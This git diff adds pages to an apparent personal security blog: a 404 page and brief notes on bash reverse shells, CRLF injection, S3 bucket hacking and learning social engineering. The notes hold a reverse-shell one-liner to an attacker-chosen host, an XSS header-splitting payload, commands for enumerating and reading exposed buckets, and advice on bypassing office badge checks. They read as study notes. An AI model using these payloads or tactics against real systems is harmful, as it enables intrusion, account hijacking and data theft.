diff --git a/content/404.md b/content/404.md
new file mode 100644
index 0000000..189bebf
--- /dev/null
+++ b/content/404.md
@@ -0,0 +1,23 @@
+---
+title: "[Error 404](/)"
+hidden: true
+noindex: true
+layout: page
+---
+
+Hi! Sorry but link doesn't exist yet.
+
+![](https://media1.tenor.com/m/3rAtEcJ09BcAAAAC/cat-loading.gif)
+
+<!-- TODO download, upscale, host here  - https://tenor.com/view/cat-loading-error-gif-19814836-->
+
+It may be still in work or not posted yet. 
+
+If this link doesn't work for 1+ weeks, please contact me!
+
+<!-- &nbsp;   -->
+<!-- &nbsp;   -->
+<!--  -->
+<!-- [Take me home!](/) -->
+
+<!-- thanks https://moonbooth.com/hugo/custom-404/ for guide -->
diff --git a/content/hacking/HowTo_Bash_reverseShell.md b/content/hacking/HowTo_Bash_reverseShell.md
new file mode 100644
index 0000000..a4b98cf
--- /dev/null
+++ b/content/hacking/HowTo_Bash_reverseShell.md
@@ -0,0 +1,9 @@
++++
+title = 'HowTo Bash ReverseShell'
+date = 2024-09-04
++++
+
+Listener - `nc -l 8081`
+Reverse shell - `bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1`
+
+May not work on hardened systems/containers.
diff --git a/content/hacking/HowTo_CRLF.md b/content/hacking/HowTo_CRLF.md
new file mode 100644
index 0000000..771c07e
--- /dev/null
+++ b/content/hacking/HowTo_CRLF.md
@@ -0,0 +1,26 @@
++++
+title = 'HowTo CRLF'
+date = 2024-09-18
++++
+
+
+Mostly fixed thing! May occure in some handwritten web-servers<!--more-->
+
+CRLF - Carriege Return (\r) Line Feed (\n) (or %0d %0a)
+
+
+
+Inserting \r\n into URL allow attacker to:
+- log splitting - to insert logs to server that may decieve administrator
+- HTTP response slpitting - Allows to add HTTP headers to the HTTP response <!-- TODO how does it work? -->
+	- XSS - `www.target.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E` - disables XSS protection, set location to custom (but does it work without 302/201 status???), sets html content-type and injects javascript.
+	- cookie injection
+	- check another note
+
+For example:
+`GET /%0d%0aSet-Cookie:CRLFInjection=PreritPathak HTTP/1.1`
+Will add `Set-Cookie:CRLFInjection=PreritPathak` header to HTTP response
+
+{{< source >}}
+https://www.geeksforgeeks.org/crlf-injection-attack/
+{{< /source >}}
diff --git a/content/hacking/HowTo_S3.md b/content/hacking/HowTo_S3.md
new file mode 100644
index 0000000..ada5df7
--- /dev/null
+++ b/content/hacking/HowTo_S3.md
@@ -0,0 +1,84 @@
++++
+title = 'HowTo hack S3'
+date = 2024-09-25
+draft = true
++++
+
+TODO ME
+
+## What is S3?
+
+### Abstract
+
+S3 (Amazon Simple Storage Service) - object storage. You can think of it as cloud storage but designed for **storing and retrieving large files**. E.g. backups, archives, big data analytics, content distribution, and static website content.
+
+S3 can be selfhosted (but you probably shouldn't do it). In other cases, company probably will use Amazon's S3.
+
+S3 have "buckets" - container/folder for files. 
+
+### Technical
+
+Interaction with S3 happens via RESTful API (`aws s3`).
+
+Each bucket have its own settings:
+ - Region - each bucket is created in specific AWS region (for performance) - e.g. `https://<bucket-name>.s3.<region>.amazonaws.com/image.png`
+ - Name - each name should be unique across all AWS regions
+ - Storage class - how fast data can be accessed 
+ - Lifecycle management - data can automatically be deleted or transfered to cheaper storage
+ - Versioning - S3 can keep snapshots of data
+ - Logging/monitoring
+ - Access control - the most interesting part for us. S3 have **public** and **private** buckets:
+	 -	In public bucket - any user can list content
+	 -	In private bucket - you should have credentials which have access to specific file
+ 
+
+## Recon
+
+### Find bucket endpoint
+
+1. Try [Wappalyzer](https://www.wappalyzer.com/apps/)
+2. [Spider](/hidden/todo/) site - `katana -js`
+3. Search 
+
+### Find credentials
+
+## Enumerate
+
+Automatically:
+https://github.com/sa7mon/S3Scanner
+
+## Manually connect to S3
+
+awscli:
+```
+aws configure
+*написать что либо, в идеале легальный логин и пароль*
+aws --endpoint=http://s3.smth.com s3 ls      		    	# list buckets
+aws --endpoint=http://s3.smth.com s3 ls s3://smth   		# list files
+aws s3 ls s3://whateverbucketname
+aws --endpoint=http://s3.smth.com s3 cp smth s3://smth 		# upload
+aws s3 mv Exploit.txt s3://whateverbucketname/
+aws --endpoint=http://s3.smth.com s3 cp s3://smth 			# download
+aws s3 cp s3://whateverbucketname/secret.txt
+```
+
+
+## Resources
+
+ - https://buckets.grayhatwarfare.com, a list with already discovered open buckets.
+
+## Train
+
+ - http://flaws.cloud/
+
+ - http://flaws2.cloud/
+
+{{< source >}}
+https://book.hacktricks.xyz/generic-methodologies-and-resources/external-recon-methodology#looking-for-vulnerabilities-2
+https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence
+https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum
+https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum
+https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum
+https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access#s3-buckets
+https://freedium.cfd/https//medium.com/m/global-identity-2?redirectUrl=https%3A%2F%2Finfosecwriteups.com%2Ffinding-and-exploiting-s3-amazon-buckets-for-bug-bounties-6b782872a6c4
+{{< /source >}}
diff --git a/content/hacking/HowTo_learn_SocialEngineering.md b/content/hacking/HowTo_learn_SocialEngineering.md
new file mode 100644
index 0000000..f13b93d
--- /dev/null
+++ b/content/hacking/HowTo_learn_SocialEngineering.md
@@ -0,0 +1,32 @@
++++
+title = 'HowTo learn Social Engineering'
+date = 2024-09-11
++++
+
+<!-- TODO xkcd meme -->
+
+Social Engineering - its **Social** skills + Events **Engineering**<!--more-->
+
+How to learn Social Engineering:
+ - Create new __Identity__ - "Today I will be Jack the electrician" 
+ - Just start interact with **all** people
+ 	 - Don't start speaking with same route: "Hello, I'm Jack, Who are you", do it differently every time
+	 - Go pick up girls ~~and touch grass~~
+ - Especially speak with people you are uncomfortable with
+ 	 - You need to have uncomfortable situations to master you being in stressful situations  
+ - If they invite you to something weird that you usually don't want to do - Do it
+ - If you have to present something as a proof of your belonging in place where you shouldn't be - Don't show it.
+
+ 
+Make your work office - penetretion testing lab
+ - Is there bage required? - Do not wear it and make some excuse. Talk your way out
+
+
+Books for Social skill:
+  - "Built for Growth" - Chris Kuenne,
+  - "Coaching Habit" - Michael Stanier Bungay
+
+
+{{< source >}}
+https://www.youtube.com/watch?v=CldNso156QY
+{{< /source >}}